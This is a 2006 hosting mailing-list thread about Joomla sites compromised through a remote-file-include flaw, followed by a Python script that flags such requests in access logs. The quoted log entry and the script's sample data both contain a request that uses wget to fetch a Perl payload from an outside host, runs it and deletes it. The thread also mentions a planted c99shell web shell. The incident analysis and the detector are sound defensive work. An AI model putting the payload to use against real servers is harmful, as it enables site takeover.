
Date:  Tue, 19 Sep 2006 20:40:52 -0400
From:  "Darrell D. Mobley" <dmobley (at mark) uhostme.net>
Subject:  [coba-e:07098] Re: Odd events for September 19, 2006
To:  <coba-e (at mark) bluequartz.org>
Message-Id:  <009201c6dc4d$6cef1c40$6400a8c0@YOUR4105E587B6>
In-Reply-To:  <05d001c6dc3c$1e84b580$02002c0a@WebHoster>
X-Mail-Count: 07098

As an aside, these exploits like systems with register_globals=ON, and if
they can't get through to your system, they bombard it with DDoS attacks.
All it takes is about 200-300 hits on the system and MySQL will get swamped.

> -----Original Message-----
> From: Gavin Nelmes-Crocker [mailto:gavin (at mark) web-hoster.co.uk]
> Sent: Tuesday, September 19, 2006 6:37 PM
> To: coba-e (at mark) bluequartz.org
> Subject: [coba-e:07092] Re: Odd events for September 19, 2006
> 
> >Yes, I have a problem, but not one with Joomla. I am using the
> >latest version of Joomla.  If the issue was with Joomla there
> >would be entries in the error_log and access_log that showed
> >which exploit was being used.
> 
> Okay, try another tack - When we looked at the site on our server that had a
> problem we found a php file that should not have been there; looking at it,
> it appears to be c99shell - I haven't found out too much about it but it's
> not good!
> 
> In our case I'm sure it got there by Joomla
> 
> Here is what I find in the logs for the same time as the file we found
> 
> julia.combios.es - - [15/Sep/2006:13:07:21 +0100] "GET /component/option,com_facileforms/components/com_facileforms/facileforms.frame.php?ff_compath=http://www.kariwuhrer.net/forums/help.gif?&cmd=cd%20/tmp/;wget%20http://www.freewebtown.com/al00rs/v6.txt;p?&cmd=cd%20/tmp/;wget%20http://www.freewebtown.com/al00rs/v6.txt;perl%20v6.txt;rm%20-rf%20v6* HTTP/1.0" 200 11120 "-" "Mozilla/5.0"
> 
> I need to analyse the logs more carefully as this isn't the file that is on
> the system, but I think it is the perl script they were running.
> 
> I suspect I will be making some complaints to ISPs shortly!
> 
> In your case I'm not sure what you have or how/why it got there but I would
> be looking very carefully for something that shouldn't be there as it is
> rare for a BQ box to go wild like that without someone trying to do
> something they shouldn't be.
> 
> Gavin
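A defender-side check for log entries of the kind quoted above, added here as an example and not code from the thread or from BlueQuartz: it parses Apache combined-format access log lines and flags requests whose decoded query parameters carry a remote URL (the remote-include signature) or shell commands such as wget/perl, scoring a line that shows both as high. The sample lines, hosts and IPs are constructed placeholders, not the thread's real values.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Apache "combined" access log line (the thread's log entry is in this format).
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)
# A query value that is itself a URL is the signature of a remote file include.
REMOTE_RE = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)
# Shell commands that show the include being used to fetch and run a payload.
SHELL_RE = re.compile(r'\b(?:wget|curl|perl|chmod|rm -rf)\b')

def find_rfi(lines):
    """Return one finding per log line whose query string looks like an RFI attempt."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m.group('target'))
        # parse_qsl percent-decodes each value; keep_blank_values keeps "cmd=" visible
        reasons = []
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            if REMOTE_RE.match(value):
                reasons.append(f'remote URL in {name}')
            if SHELL_RE.search(value):
                reasons.append(f'shell command in {name}')
        if reasons:
            # A bare URL-valued parameter can be legitimate (redirect targets); a URL
            # together with shell commands in the same request rarely is.
            kinds = {r.split(' in ')[0] for r in reasons}
            findings.append({'host': m.group('host'), 'time': m.group('time'),
                             'path': parts.path, 'status': m.group('status'),
                             'severity': 'high' if len(kinds) == 2 else 'medium',
                             'reasons': reasons})
    return findings

# Constructed sample lines: one attempt shaped like the thread's entry (placeholder hosts),
# one ordinary Joomla request, one benign request carrying a URL-valued parameter.
SAMPLE_LOG = [
    '203.0.113.7 - - [15/Sep/2006:13:07:21 +0100] "GET /components/com_facileforms/facileforms.frame.php'
    '?ff_compath=http://attacker.invalid/help.gif?&cmd=cd%20/tmp/;wget%20http://attacker.invalid/v6.txt;'
    'perl%20v6.txt;rm%20-rf%20v6* HTTP/1.0" 200 11120 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [15/Sep/2006:13:08:02 +0100] "GET /index.php?option=com_content&task=view&id=12 HTTP/1.1" 200 8421 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [15/Sep/2006:13:09:40 +0100] "GET /index.php?option=com_login&return=http://www.example.com/ HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
]

if __name__ == '__main__':
    for f in find_rfi(SAMPLE_LOG):
        print(f['severity'], f['host'], f['path'], '; '.join(f['reasons']))
```

Run it against a real access_log by replacing SAMPLE_LOG with the file's lines; a 200 response to a flagged request is the case worth checking for a dropped file such as the c99shell mentioned above.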